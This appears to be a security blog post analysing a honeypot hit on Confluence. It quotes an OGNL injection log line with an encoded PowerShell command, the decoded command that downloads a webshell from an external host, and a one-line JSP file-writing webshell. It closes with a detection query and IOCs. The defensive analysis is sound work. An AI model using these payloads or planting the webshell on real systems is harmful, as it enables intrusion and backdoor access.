data:image/s3,"s3://crabby-images/b8917/b891742f68378a86620ea1055cf9f4e8cbb47449" alt=""
When running honeypots you never have to wait too long for something to drop!
This moring we had a new hit in the pot, so I decided to invesigate but also to blog and show how we could go about investigating the logs and paylods etc.
[08/Jun/2022:07:00:36 0100] - http-nio-8090-exec-7 212.30.60[.]161 GET /login.action HTTP/1.1 200 47ms 7126 - python-requests/2.27.1
[08/Jun/2022:07:00:39 0100] - http-nio-8090-exec-8 212.30.60[.]161 GET /${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cmd.exe /c powershell.exe -exec Bypass -noP -enco KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbwB0AG8AcgBmAHUAbgAzAC4AZABlAC8AaQBuAGMAbAB1AGQAZQBzAC8AYQBkAGQAbwBuAHMALwBlAHIAcgBvAHIALgByAGEAcgAnACwAIAAnAC4ALwBjAG8AbgBmAGwAdQBlAG4AYwBlAC8AZQByAHIAbwByAC4AagBzAHAAJwApAA==").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/ HTTP/1.1 302 595ms - - python-requests/2.27.1
This creates a webshell backdoor named error.jsp
Read more: Learn to SOC: Java Webshell via confluencesha256:9EDB929C10532EE626BE9B25461DD7F0FD7DA780EB19E919E85F2A02B92E22FC
As from the above confluence access logs this decodes to:
cmd.exe /c powershell.exe -exec Bypass -noP -enco KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbwB0AG8AcgBmAHUAbgAzAC4AZABlAC8AaQBuAGMAbAB1AGQAZQBzAC8AYQBkAGQAbwBuAHMALwBlAHIAcgBvAHIALgByAGEAcgAnACwAIAAnAC4ALwBjAG8AbgBmAGwAdQBlAG4AYwBlAC8AZQByAHIAbwByAC4AagBzAHAAJwApAA==
which results in (de-fanged)
(New-Object System.Net.WebClient).DownloadFile('http://www.motorfun3[.]de/includes/addons/error.rar', './confluence/error.jsp')
which drops error.jsp into the confluence web root.
data:image/s3,"s3://crabby-images/52879/52879e7a04492a79fac2558291aca34808792406" alt=""
This webshell has a range of functions:
data:image/s3,"s3://crabby-images/88fe3/88fe33e38d7934eaaadfb5be9dab3d052ec734ff" alt=""
data:image/s3,"s3://crabby-images/010fe/010fe06ca01b94cc711c0275354189f7af90f99d" alt=""
now i’ve just run whoami
data:image/s3,"s3://crabby-images/993c8/993c83f4ec8e53951b9fa735a27f9d04a2b9cff9" alt=""
We can see here the context of the service is “nt authority\network service”
We also can confirm that this execution is detected in MDE:
data:image/s3,"s3://crabby-images/722ab/722abe9863587d0106c00c875f135beef40b0b7a" alt=""
Detection in MDE
The following KQL query will find the webshell being dropped:
DeviceFileEvents
| where FileName has ".jsp"
| sort by Timestamp desc
I’ve left that wide on purpose feel free to tune that!
data:image/s3,"s3://crabby-images/dd797/dd7974a19359afa8ceea354680bc88191cf301ea" alt=""
Webshell
It appears to have originated here:
https://www.vonloesch.de/index3258.html?page=1&%24Version=1&%24Path=/
You can see this online on github:
https://github.com/tennc/webshell/blob/master/jsp/jspbrowser/Browser.jsp
I also found another chopper style shell from another actor located here:
/includes/users.jsp
<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>
IOCS
Threat Actor IP: 212.30.60.161
error.jsp webshell shah256: 9EDB929C10532EE626BE9B25461DD7F0FD7DA780EB19E919E85F2A02B92E22FC
suspected compromised site: www.motorfun3[.]de
webshell download url: ‘http://www.motorfun3[.]de/includes/addons/error.rar’